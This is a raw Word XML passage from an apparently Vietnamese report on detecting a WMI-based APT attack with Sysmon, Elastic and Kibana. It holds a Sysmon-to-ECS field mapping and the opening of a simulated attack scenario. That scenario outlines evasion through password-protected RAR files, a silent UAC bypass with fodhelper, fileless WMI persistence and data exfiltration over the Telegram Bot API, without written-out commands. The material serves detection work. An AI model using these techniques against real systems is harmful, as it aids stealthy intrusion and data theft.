          <w:tcPr>
            <w:tcW w:w="682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7AB1E52" w14:textId="0629EE4C" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gửi thông báo realtime đến Telegram Bot — chat_id: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6DF13710" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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EB38C39" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kibana SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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9174CFC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hiển thị alert, Investigation Guide, timeline cho SOC analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59DA40A5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EEE012" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 ECS Field Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16DC1E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Elastic Agent chuẩn hóa các trường Sysmon sang Elastic Common Schema (ECS) — chuẩn field name thống nhất cho phép viết detection rule không phụ thuộc vào log source cụ thể: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B01B4A" w14:paraId="7BB62BB4"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370752FA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000"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2F06FFD6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3626"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3A91855E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mô tả</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4C830F3C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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6B7A050" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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D8DE3B9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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765EEB2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Đường dẫn đầy đủ của tiến trình</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2C8EAD44" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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5AEC5234" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CommandLine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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71A73D3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.command_line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="362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0CDA44D1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dòng lệnh đầy đủ bao gồm arguments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="440CB2E2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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899CB0A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentImage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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F0F2775" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.parent.executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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36991D7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Đường dẫn tiến trình cha</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2BA81DDD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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6375069" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentCommandLine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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03148A7D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.parent.command_line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="362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61195AE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dòng lệnh tiến trình cha</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4D67934A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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B8E761B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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355ED4F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>user.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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27DC126" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tên người dùng thực thi tiến trình</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="04DF9C52" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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98A5879" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Computer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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B70E495" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>host.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="362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4FE2508" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tên máy tính (hostname)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="16190F2F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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17CA54C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TargetFilename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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5DE0E3A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file.path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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2D4BB0F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Đường dẫn file (EventID 11, 23)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3D273F0F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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5A6844A8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TargetObject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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D1EBEEA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>registry.path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="362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F8F07B3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Đường dẫn registry key (EventID 13)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="0BE4005E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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5AB04E8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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CE805AF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>registry.data.strings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C2ED666" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Giá trị registry được ghi (EventID 13)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6BDC63A1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4EECC8C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DestinationIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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829EBC2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>destination.ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="362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B461D3D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP đích kết nối (EventID 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6DAF4EC6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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0E719B8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DestinationPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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CD24FA2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>destination.port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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B45BEA2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port đích kết nối (EventID 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3A881CC8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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96E00EE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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0C26A62C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winlog.event_data.Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="362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1C19544" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Consumer name (EventID 21)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="581F0C7C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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2C4FEA6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EventID (raw)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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A69DF8D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winlog.event_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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AB1F55F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>String "1","13","21"... (dùng trong EQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A2EDC1F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BF5A65" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lưu ý quan trọng cho viết EQL rule: winlog.event_id trong Elastic phải được so sánh bằng giá trị string ("1", "13") chứ không phải integer, do Elastic Agent map EventID thành text field trong một số cấu hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB92F4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4198AB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VI. KỊCH BẢN TẤN CÔNG WMI APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8AC60A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Mô Tả Kịch Bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC5962" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kịch bản tấn công được xây dựng theo mô hình APT (Advanced Persistent Threat) 7 phases, trong đó kẻ tấn công sử dụng hoàn toàn LOLBins và kỹ thuật living-off-the-land. Mục tiêu là xâm nhập vào máy nạn nhân qua social engineering, leo thang quyền ẩn, cài persistence không để lại dấu vết trên disk, và exfiltrate dữ liệu qua kênh HTTPS hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5DBFDF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Đặc điểm nổi bật của kịch bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53969B7D" w14:textId="44BD1795" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Không có malware binary hay file .exe độc hại — 100% LOLBins</w:t>
      </w:r>
      <w:r w:rsidR="002F741A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - C</w:t>
      </w:r>
      <w:r w:rsidR="002F741A" w:rsidRPr="002F741A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>hỉ dùng mshta, wscript, powershell, reg, fodhelper, curl, arp, ipconfig, etc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> và Windows built-in tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D7DD34" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Initial Access qua RAR có mật khẩu — qua mặt gateway AV không thể scan encrypted archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E0915" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>UAC Bypass hoàn toàn silent — không hiện dialog, không cần tương tác người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF2167" w14:textId="22C07C4A" w:rsidR="00B01B4A" w:rsidRPr="002F741A" w:rsidRDefault="002F741A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="002F741A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Persistence qua WMI — không sử dụng registry Run key, tồn tại qua reboot, và chỉ dùng script PowerShell hợp lệ (không có binary lạ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E713DCB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exfiltration qua Telegram Bot API — HTTPS traffic hợp lệ, không bị chặn bởi corporate firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C5244" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Chuỗi Kill Chain 7 Phases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
        <w:gridCol w:w="1366"/>
        <w:gridCol w:w="1192"/>
        <w:gridCol w:w="2065"/>
        <w:gridCol w:w="2152"/>
        <w:gridCol w:w="1860"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="408034C7" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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55CCB30C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1366"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28FDC3FA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192"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2A5427E3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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798AEFAD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2152"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6219B33C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool / Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860"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0EFDFA83" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon EID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1A363DBB" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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175912F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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64F7836" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
